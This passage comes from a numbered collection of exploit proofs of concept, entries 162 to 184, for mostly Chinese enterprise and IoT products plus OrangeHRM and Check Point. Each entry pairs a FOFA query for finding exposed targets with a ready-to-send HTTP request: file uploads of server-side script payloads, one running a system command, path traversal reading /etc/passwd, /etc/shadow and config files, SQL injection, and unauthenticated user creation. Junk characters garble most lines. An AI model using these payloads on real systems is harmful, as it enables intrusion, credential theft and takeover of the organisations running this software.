' s, I! z1 I% @0 Y/ [ A# G1 Q7 dAccept-Encoding: gzip" a+ ?. C* e; b+ `. a* A, G
- n: F5 n# ^* Q, v ]
<?xml version="1.0" encoding="utf-8"?>5 F3 Y# Q& h8 b: \* d* r3 Z, Y
<soap:Envelope xmlns:xsi="
- i' p8 a6 S# _& `2 \http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"/ j5 q' g3 I' @2 G' Z; I8 D7 U% A
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 c; C M2 p8 M' ?6 G6 \<soap:Body>
8 i! n1 h" h" O+ a: t9 x# {<UploadResume xmlns="http://tempuri.org/">
2 ^8 {6 L2 {* R# G! d' n$ @3 O% }<ip>1</ip>
' W; V5 q5 q% j( w5 }$ }& C<fileName>../../../../dizxdell.aspx</fileName>- @1 D# W4 s* x( C4 g+ X0 `5 {: F
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>2 H5 y2 W, d# B
<tag>3</tag>6 p; G$ u2 ], y1 a* |$ u. j
</UploadResume>" }$ q9 t4 L3 R" u+ M& Y
</soap:Body>
5 I( C# c5 m+ i% E7 a1 d</soap:Envelope>
' U* G0 B- t$ Q' ?3 Y# x1 Y: ~. z5 m9 P( q2 X# x7 S& W5 p2 B
' {0 ~1 K! Y8 ~7 v. q* `: @/ whttp://x.x.x.x/dizxdell.aspx
0 U9 m/ U g; m6 ~) A3 b: t( Z z; d: @) {1 ~! d5 X4 C. E& E" x( n) [8 M, a
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传# s+ M0 f; }* N( X
FOFA: app="和丰山海-数字标牌"
. l7 g. R! z& x: ]/ JPOST /QH.aspx HTTP/1.1$ r1 D. K" d, `4 v2 p* d4 m9 l
Host: x.x.x.x
! Z" C8 P( e: F% ^. NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
: r9 ~; A, f3 k0 |Connection: close; F; Y6 \0 s' A5 W, W# j0 T9 }# @
Content-Length: 5830 q! T8 m* o1 `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
; O# v! E/ ^& t3 u$ A8 w2 Q$ D3 ]$ D& wAccept-Encoding: gzip- B# Y) T! Q" s) f
) V8 @4 ~' C3 U: M------WebKitFormBoundaryeegvclmyurlotuey
* E/ B/ m% s* s4 f2 TContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
& _2 w. E1 S" f4 }: r; W2 PContent-Type: application/octet-stream, Q, ] K6 D' Z) ?# p
( }, i* Q1 Z' ^$ I1 Z- j
<% response.write("ujidwqfuuqjalgkvrpqy") %>& G3 v* a7 }" g
------WebKitFormBoundaryeegvclmyurlotuey# r/ ?& Y M0 s0 ]
Content-Disposition: form-data; name="action"' `3 A1 p% b8 B
8 e+ d7 N5 ?" k9 J7 e% Tupload
% B3 R, h1 k" x- W. ^------WebKitFormBoundaryeegvclmyurlotuey# y$ ]5 ?$ w8 J3 F) O
Content-Disposition: form-data; name="responderId"# R4 i; N2 `5 i Q0 u! {" T; t
: m# ]" I, V1 k4 g2 t3 |9 SResourceNewResponder4 f6 X3 g* _( k: ^5 X2 K
------WebKitFormBoundaryeegvclmyurlotuey7 u& k, u( n1 I/ L: `7 y
Content-Disposition: form-data; name="remotePath"
, A4 V& j+ i9 _
3 J6 n3 B6 L" E8 p/opt/resources. e2 a+ t3 X( _/ _6 m
------WebKitFormBoundaryeegvclmyurlotuey--7 ]: S6 K# l. F1 V$ }3 s% Q0 t! R
; ]- M1 T5 I. E% F% Q# o; K! U9 ^
7 M9 j5 v0 l/ W; g/ d
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
9 S _5 J$ {' \3 r; ?7 G
5 C+ `* T* D4 Z8 a0 ~! p3 b163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
+ ^. `, k i8 u6 u* M+ HFOFA: icon_hash="-795291075"1 q7 v5 }$ ?8 |& [6 ?% `: o A+ t
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
( [" [! J% t, _Host: x.x.x.x7 L3 i r' m+ |. F6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36; w% z m0 ?1 L/ z
Connection: close% k7 x8 G8 w7 G
Content-Length: 293
9 X6 P' ~( h. k1 \2 O. t0 i- |, VAccept: */*
' k2 P. [3 p8 ^0 U9 y% p; M: K7 AAccept-Encoding: gzip, deflate+ U: Q8 A% }% n, d3 L
Accept-Language: zh-CN,zh;q=0.9" b, }5 y$ X* U+ {$ U
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod! V2 p" v. j- U# j1 F* V: |( ~
7 p4 |2 u8 O1 j------iiqvnofupvhdyrcoqyuujyetjvqgocod' m+ Q% X+ o3 _* ]
Content-Disposition: form-data; name="name"0 A! g( g! G- S3 j% c
% Q7 ~! q# F2 U- y* ~$ t6 e3 S2 [
1.php
8 c- x! ?; v4 H6 N" \/ E4 S------iiqvnofupvhdyrcoqyuujyetjvqgocod
0 B( U, J4 l. w( |7 @, ]( `& r5 yContent-Disposition: form-data; name="upfile"; filename="1.php"
( ?/ s3 y6 S4 ~: BContent-Type: image/jpeg
- t+ n+ m' D7 G2 }6 @) Q9 d" ^( @1 ^% e3 |0 K" }
rvjhvbhwwuooyiioxega
* m! G1 h. C. o6 f2 s------iiqvnofupvhdyrcoqyuujyetjvqgocod--- H4 ^5 R5 U, i& i
" B: H# f- x- F4 s) P' g
- p' d! W0 k& s( m( e/ b164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
% E. R" R0 R3 B+ o+ X- I8 Z$ bFOFA: title="智慧综合管理平台登入": v) i" [0 g- K* ]5 _2 y
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
" t" f4 O. R; E! C. O' Q: v2 oHost: x.x.x.x
' s) u3 A& l& @: P6 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0. M# ~. c' p4 E% d& B; E
Content-Length: 288
U, R: g( v3 B5 I) hAccept: application/json, text/javascript, */*; q=0.01
# z9 P8 N2 n4 r& f: R9 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,6 a9 F0 q! R# p
Connection: close
: }- L& H9 R7 oContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl# t7 H3 Y" H( k, k) D
X-Requested-With: XMLHttpRequest
' V) j) ^& }7 Y3 ]# lAccept-Encoding: gzip
+ q, k7 D2 b) L- s& o7 A9 l4 b. e9 e) o
------dqdaieopnozbkapjacdbdthlvtlyl- M$ Y- q" L) T9 Q8 O S
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
: b, b [' Q+ c7 AContent-Type: image/jpeg. M" T8 ^! b% L. f8 ~/ J `! Q
. |& D/ K( v$ d ?+ L9 r( Z<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>. @' o( Z/ ~* T4 H5 g9 H
------dqdaieopnozbkapjacdbdthlvtlyl--
3 A' I$ H2 k4 l' G' Y9 E# x1 M; w
5 t$ o6 h' J) p. H$ o m, U. ]" {- N [( s3 O+ u
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx5 }( f% m B! ~0 j
& i5 j* {! c* R
165. OrangeHRM 3.3.3 SQL 注入
% l/ \- k" q9 [# X$ yCVE-2024-36428
- R, [1 Y- z6 R' PFOFA: app="OrangeHRM-产品"4 p; p) t1 M' V3 {9 Z w
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))+ @# l; |9 }3 b% {! c$ h3 Y. b% z4 {% D
! }. T$ Q$ G$ v0 E: R
( a. A1 H& |- p5 H) p8 h1 s6 a
166. 中成科信票务管理平台SeatMapHandler SQL注入3 y0 H# l* C) \+ [( U) k
FOFA:body="技术支持:北京中成科信科技发展有限公司"/ v( ?! |2 J. Y$ Q% ?
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.16 b$ \" U# V; c% r
Host:( g; K0 b1 q% e' b, `8 F+ @& G
Pragma: no-cache
- I+ L H9 m# P! g8 ~7 M0 ?7 W" u& h6 lCache-Control: no-cache& R/ D6 z Z1 `* L' {
Upgrade-Insecure-Requests: 19 D$ f6 q. b$ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 y5 E W, O' B" u% mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: A3 K# h: t$ A
Accept-Encoding: gzip, deflate
% M- v7 h+ K1 g' R" H% l; R% eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
: T/ k( D4 c/ \Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE L- L6 b0 ^/ n Z/ P6 m6 p
Connection: close4 s) L" e* W3 `8 z
Content-Type: application/x-www-form-urlencoded+ R4 j2 z) ^) u7 H- t& P
Content-Length: 89' a N$ f, W. ]! \' x
* I8 N r6 l: B: \/ k5 o( U# C
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE# P& u( W$ n1 C) O, h, n: `
, J9 _& n2 x! e) F; ~! R( ]/ u8 L% q3 N. }7 R: D5 k4 O5 \% u
167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ g- @3 A [, {& cFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
' [: E4 W4 }9 n+ S1 o- gGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.15 ~) S) i( i3 X2 [2 Q- P
Host:
9 a! C4 V+ }/ ?9 f5 U4 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( Q# s }9 P2 M3 N& {6 z; d
Content-Type: application/x-www-form-urlencoded
! V; W2 P/ `7 {% Q7 \4 f6 FAccept-Encoding: gzip, deflate3 e% ^, E& z) f1 H+ y) W1 u% a! w2 G3 I
Accept: */*
- V" F$ s+ F- F# [Connection: keep-alive
. C7 E, h G7 N$ L; `
: j( G3 S5 H* D* s( D
% Y; k( H/ b- @' Y/ ^, i' o- p168. 宏景EHR OutputCode 任意文件读取
8 ~) R0 C& j- O, V6 Q0 PFOFA:app="HJSOFT-HCM"4 ~* }# L$ W ]
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1# u$ c; P& q: _0 ?1 U0 V
Host: your-ip
+ m( U* S, t) n5 o( A2 D- t" gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
- I8 J8 s( A0 o2 BContent-Type: application/x-www-form-urlencoded& B* D n t! |* T% {$ j [* s
Connection: close
9 q9 W' }' r3 E. O8 O2 ^3 A( k8 Y3 J* w! @' Z, Y
, {6 w; \5 m, ^. \6 ^7 X5 O' S
j& r y5 a" b169. 宏景EHR downlawbase SQL注入
! |$ ~# b4 m! h& e( @FOFA:app="HJSOFT-HCM"' H# ]1 M: k! ?1 }* ~
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.14 f5 r4 r5 Z" U& N8 V M
Host: your-ip
2 J1 u' u0 e8 x4 |( _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- v8 J. ]8 _3 k: g) [* z: G! J
Accept: */*
* F' P# A' M' e0 j4 o& ~, o; j" yAccept-Encoding: gzip, deflate+ Q! D2 v: [2 L: f2 ?
Connection: close4 O3 {9 F( v! X1 `
. v4 k& C, @. D; }* Q
6 R, Y9 y* U" o. q$ V/ E1 b& }$ ` A4 w0 v. a4 n0 L3 y7 F
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; _ y/ N$ X* T. v& OFOFA:body="/general/sys/hjaxmanage.js": h+ ?% T1 k: n8 O7 J5 W
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
3 b' r% n1 C' W+ x) x0 }. OHost: balalanengliang# U# a& l7 u$ M+ W5 i% u
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) H: Y- o# F( _" R( J, vContent-Type: application/x-www-form-urlencoded4 [6 H2 X" ?& S8 l4 e0 }
6 u1 Q" B2 Q, }7 C% F$ [filename=../webapps/ROOT/WEB-INF/web.xml
% J5 N4 H0 m3 f6 D; S" s
4 R1 y$ p" o$ [) |% R# L: [. @$ m* f8 r ]' a2 m2 [
171. 通天星CMSV6车载定位监控平台 SQL注入- V% }2 s W; @8 ~
FOFA:body="/808gps/"( X; ?( E3 j; l- j
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
7 x6 f' b2 }0 @Host: your-ip" t8 t% n- k" f! f- {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& ^% F# @" t) t1 W$ U
Accept: */*
) L4 h2 Z H# h$ W7 l6 {7 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 @, |% g6 l6 uAccept-Encoding: gzip, deflate' n! z9 D/ \$ H2 W
Connection: close4 h+ ]8 h ?5 ~; {4 u% I
* H' k- }( P) P8 e" {4 x7 a5 U7 P8 b( y5 Q" c6 G
8 t/ ^- U8 g; O1 H8 Z/ M8 f/ d: W, a
172. DT-高清车牌识别摄像机任意文件读取( z: m( M4 Y# S8 m, o$ `9 N8 |! b
FOFA:app="DT-高清车牌识别摄像机"- d& Y; O& t/ {
GET /../../../../etc/passwd HTTP/1.1
) g3 F# r: z8 AHost: your-ip
! \9 }/ U4 }1 Q' t& LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, G3 e) }5 i' N0 E0 bAccept-Encoding: gzip, deflate
0 S, _. u) m2 W {) f9 IAccept: */*4 O; [* u% x, u4 F1 S9 _7 d/ X# _
Connection: keep-alive
3 a( {0 @# u2 F7 T) v
4 O5 X8 ^* \4 s2 I6 \( o0 ^/ G0 o; x6 n' l' [' G
4 T" X. j9 s5 q+ m9 H. y173. Check Point 安全网关任意文件读取
2 @6 k1 t/ Y7 lCVE-2024-249192 w1 j" h! r F' H9 b
FOFA:app="Check_Point-SSL-Network-Extender"8 Z6 ]% M; @9 J( A
POST /clients/MyCRL HTTP/1.1
3 y8 @0 ~; o- K, E5 `9 C: g3 dHost: your-ip
% ?! K& \; z0 lContent-Type: application/x-www-form-urlencoded
, d( h9 G y) M; V
* p4 A2 i# V4 |aCSHELL/../../../../../../../etc/shadow/ T/ j5 D! H) ?2 A0 u% |
5 F- b+ N4 _5 q0 K! w- G
+ N2 o1 ^- O* j. [, L% V& N4 B# Z6 T) C/ Y: @/ z
174. 金和OA C6 FileDownLoad.aspx 任意文件读取3 ?8 r/ t2 k5 H+ s; p. H) I9 ^
FOFA:app="金和网络-金和OA"6 K" q: v. i8 t- A) `* S; R5 A
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1+ g/ k* [: o* i; f2 H; Y( s$ s# X
Host: your-ip2 ]3 T5 q1 V/ S- f2 m. m, U) [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 p# O9 ^5 m e1 L7 E6 g; qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! C/ _) e4 e4 x& j) z
Accept-Encoding: gzip, deflate, br4 j' n& E9 m1 n) z1 k9 Y9 j D
Accept-Language: zh-CN,zh;q=0.9) Z7 V) H& t5 p3 d- E
Connection: close
! B- y2 P+ R$ F; u* ^# ?9 c) y& k6 c7 @9 z2 \! A. L7 y9 y$ u3 }
' R) Y8 U- j9 G* J c
! \) F/ W$ h# [ k8 V! u6 Y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- h: ^: U1 G$ ?* X7 f
FOFA:app="金和网络-金和OA"" J# H- i9 ~1 A. i( E
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 e, o' @+ z) o6 e" NHost:/ I8 z* I: I* F3 x
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 g% I8 V `: D7 J) W/ s6 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: I) |, {0 j3 g: N+ B" @6 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( J( y4 c M% z+ n/ `7 q' q& E5 IAccept-Encoding: gzip, deflate. [; }3 x- j8 f# Z" Y% Y
Connection: close/ c! G) L; Y& W1 c6 P# _
Upgrade-Insecure-Requests: 14 [( I5 V5 I9 n, L7 I5 A3 W1 |
1 Y+ ]0 T: ~9 w* k! c) [
/ Z# Y/ T* S: L% B) r* {176. 电信网关配置管理系统 rewrite.php 文件上传
+ t( O. F9 p& z0 HFOFA:body="img/login_bg3.png" && body="系统登录" M( ?' B( E- R
POST /manager/teletext/material/rewrite.php HTTP/1.1
2 A! ?3 F2 V8 g. a" YHost: your-ip
5 @2 ]' q3 h/ K# ^ d- v1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 D9 e. R9 Q* i8 D+ e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT8 S3 l/ u% G* v
Connection: close7 [, }* j0 o( I) h# J [
# |. M' o+ r( u0 Z9 _' d# H/ v------WebKitFormBoundaryOKldnDPT- O% D/ p1 b3 C: M9 y
Content-Disposition: form-data; name="tmp_name"; filename="test.php"( W9 v/ e3 a* L
Content-Type: image/png7 h, k; w1 r6 [
) k& k$ y7 b* Z2 G( r: t9 ^
<?php system("cat /etc/passwd");unlink(__FILE__);?>/ {2 i7 \7 |, s) s! ]! z
------WebKitFormBoundaryOKldnDPT/ Q9 z# o1 F& l3 y/ f
Content-Disposition: form-data; name="uploadtime"
+ m }2 \% ]) e; x/ b
% C: b) [* l8 x, ~% B7 b8 m R
v. ~2 k- q: ?------WebKitFormBoundaryOKldnDPT--
0 i8 E! m2 ~8 u+ g
' ?- T7 k* w& @9 o
! h3 H# Y$ d4 k
6 d% p7 ~; D4 c6 a& ^, J) K6 B2 `) d7 `177. H3C路由器敏感信息泄露0 q7 b. r( _% ^2 H! K
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
2 O6 ^! M: f0 ~# S9 Y+ m. g/userLogin.asp/../actionpolicy_status/../M60.cfg3 t: O! q: B& S8 m' v) d
/userLogin.asp/../actionpolicy_status/../GR8300.cfg/ f: N4 b9 \7 C# ~' C" I
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
c+ F5 Y: _; v8 ~/userLogin.asp/../actionpolicy_status/../GR3200.cfg; a% e! k$ f# R7 S% n9 F
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
7 l0 @$ J8 }8 v- |) D; R/ m: `/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
; q$ |( X* r0 n" F: \/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 o) ?! Q$ n7 w( t+ U J! ~
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg% x/ c8 O5 p4 B! Z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
4 a0 E0 u' G& j8 t: j8 o/userLogin.asp/../actionpolicy_status/../ER5200.cfg
9 f9 }, d/ r& ^/ e9 {0 @. m/userLogin.asp/../actionpolicy_status/../ER5100.cfg
0 V+ }/ g0 I6 s! J+ r& S9 n/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg U) ?: U2 M$ T( r+ b8 |- y
/userLogin.asp/../actionpolicy_status/../ER3260.cfg1 v7 v( m- E# `! }
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
! i @4 t, q' U9 F4 T, B5 P1 A/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& p" W" ^/ ?$ g q% R3 c( Q4 U$ e/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
4 d5 P6 g0 Q; W' k. O: s. \4 m, X/userLogin.asp/../actionpolicy_status/../ER3108G.cfg7 R$ m3 _9 b/ }2 G% c
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg" p# w* n5 U! W# Z9 i8 X5 i
/userLogin.asp/../actionpolicy_status/../ER3100.cfg- d3 Y, m' h( Z+ O/ p1 `
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg6 N% I9 W ~& z: o5 K1 X5 E+ k
9 S/ K' R9 {, C
- v* u) v* ^' Q$ w
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
8 T# O; U7 A `+ PFOFA:header="/selfservice"
# P) g* S- q- `/ O1 yPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1- _ ^. B( a7 j+ J: k& P" r
Host:
& o* {6 b/ @7 ? g5 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ b' `2 G) N# J5 U, K
Content-Length: 252* A; m9 H# H+ x5 b* e5 D
Accept-Encoding: gzip, deflate
; D/ l( g0 F; C. Y$ \3 sConnection: close; B+ O0 @2 o8 X' w
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l; @! J$ u3 n! O. K2 r
-----------------aqutkea7vvanpqy3rh2l
* `+ y/ p3 _: B/ _( P, x- ~# AContent-Disposition: form-data; name="12234.txt"; filename="12234"
3 l8 ?' f, R% u6 m, h; AContent-Type: application/octet-stream
. E. z4 c5 B6 }& d# ]. ]3 N8 M. S9 kContent-Length: 2557 _% d; e, c( k/ _
0 ]1 B6 u* K, y* O1 c6 A y7 s122345 d# F( m% Q8 X p ~# f& v
-----------------aqutkea7vvanpqy3rh2l--+ d3 w8 B$ |- ^- C
) r$ O* H! e2 y
1 F4 ` G' m7 L J% nGET /imc/primepush/%2e%2e/flex/12234.txt" { z [4 P6 e( M+ _
l5 W- x9 W# Z9 J; j9 d4 C5 U
% i" b" ?' G) @# K179. 建文工程管理系统存在任意文件读取 y6 R$ ^; r2 Z r/ U- h: a5 J. _) K
POST /Common/DownLoad2.aspx HTTP/1.1
6 Y9 h, ?. P/ I1 q% k& J3 _Host: {{Hostname}}
5 v9 C. ]* p% S# z7 [6 hContent-Type: application/x-www-form-urlencoded
; p( C3 I! G/ I0 _( RUser-Agent: Mozilla/5.0
# n+ {4 C& ]0 B
5 y( S5 t7 o1 x% \* T$ ]0 epath=../log4net.config&Name=+ W& l& I8 T3 @( ?, s
2 Z5 c" n2 T# ^7 u% Z A5 m1 ]3 c/ l6 _
0 e5 k: C% c- O6 n+ z$ q4 R180. 帮管客 CRM jiliyu SQL注入
+ V4 F3 f: i) B( c6 R9 vFOFA:app="帮管客-CRM"
3 i: I5 A) |; y2 |GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 G6 a( t& l. s9 ]
Host: your-ip
# O1 f; Y) P( u' |! bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
J; Z* q% W6 r1 X; a% [/ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- |* ]5 w' ~( }9 t2 {" NAccept-Encoding: gzip, deflate. _0 f4 E: @- R' P* P; H# t5 \
Accept-Language: zh-CN,zh;q=0.9
" X" q8 s' C3 J6 PConnection: close
" s- ]/ E1 G9 ^2 C# r( _) Z5 x- l0 h, T5 v
" L6 F* M0 j" L( k& s/ W181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
2 a9 B3 \# g! @5 A8 ~FOFA:"PDCA/js/_publicCom.js"
# g( S$ H& E# \* o* l: W6 oPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.12 T* {" e: `$ \: X
Host: your-ip
9 P% a6 U; t2 a+ V/ O' A/ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: S8 C" X7 N. ? k! D% d1 Q& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: k S7 i7 \, m# TAccept-Encoding: gzip, deflate, br
9 X& ]2 W1 w) @; CAccept-Language: zh-CN,zh;q=0.9
! x& P4 M f" sConnection: close! V, F: h# W" L
Content-Type: application/x-www-form-urlencoded
v3 P; x8 x9 N- A7 ?8 ?" V3 ^2 @4 x3 j4 ]
: X# ?% g, d0 c5 H; B) [
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
) J+ |8 Y. o& |5 B, c! `$ S, A
: N7 \; B* }" F: u& g7 u
( e: g) e' }4 P" @ E+ [# g. D r182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; b( ]; i' i& J4 t# h2 {, kFOFA:"PDCA/js/_publicCom.js"
# F( m/ Y; v/ S* V ZPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1" k3 l5 O' q, i0 c
Host: your-ip
0 a5 C0 I% t! O. G6 P% y8 |& QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
2 k$ |( a+ m* z( B8 i) GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& Z. t/ ~0 A& e. cAccept-Encoding: gzip, deflate, br' V. w% A3 y1 ^( r# F1 [8 a1 m" v
Accept-Language: zh-CN,zh;q=0.9
: l- z) }% Z4 f1 EConnection: close: n0 U$ y2 G& Y/ G& V2 ~/ w N
Content-Type: application/x-www-form-urlencoded
5 j6 Q9 y2 u0 q2 A' j* S
# Y# N; R8 u2 l* `" O6 R5 g6 n' Z& Q5 h( t
username=test1234&pwd=test1234&savedays=1
* [0 m- h# ~$ G. P# X: C$ ~$ U, p9 A9 n; ]# J+ v" r* e
5 N2 K; t- \9 R& C4 K- p
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
$ T3 W( r- c2 L: ~8 j& yFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面" I* i1 a. x5 I& ~
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
+ h2 A2 U" t5 T$ yHost: your-ip3 @5 |( T+ T- I6 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* Z: a& K1 M6 qAccept-Charset: utf-8/ C8 {- K0 k c; P2 D0 f
Accept-Encoding: gzip, deflate& m& o$ m+ b: u, j
Connection: close7 {0 P1 I* N" B/ F2 K: Y
/ d0 U( \. N8 ?$ `6 k
+ w1 o: ]6 _! U3 S4 g184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! }: R& N8 A, o
FOFA:server="SunFull-Webs"% m1 {$ }8 L, m) C
POST /soap/AddUser HTTP/1.1. h+ Z6 U: N% o0 t' m
Host: your-ip
/ ?7 ] s3 Z& i' zAccept-Encoding: gzip, deflate, o& K) ]' A' e/ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.03 D/ d# [" \) }( o/ [
Accept: application/xml, text/xml, */*; q=0.01
) U3 O" o3 d4 r6 gContent-Type: text/xml; charset=utf-8! ^" x2 Y |9 Y _# e! s7 u
